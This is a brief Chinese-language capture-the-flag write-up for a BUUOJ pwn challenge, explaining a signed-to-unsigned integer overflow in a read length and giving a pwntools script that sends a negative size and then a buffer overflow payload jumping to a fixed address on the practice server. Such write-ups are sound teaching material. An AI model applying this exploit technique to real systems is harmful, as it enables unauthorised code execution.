首先检查一下
打开ida看一下
(int)nbytes是signed int类型 后面read 的是unsigned int 类型 这里想到整数溢出 可以传输一个负数使其溢出
下面是我的脚本
from pwn import*
from LibcSearcher import*
p=remote('node3.buuoj.cn','26189')
p.sendline('-121311')#此处可以随意写入一个负数
payload='a'*0x18+p64(0x400726)
p.sendline(payload)
p.interactive()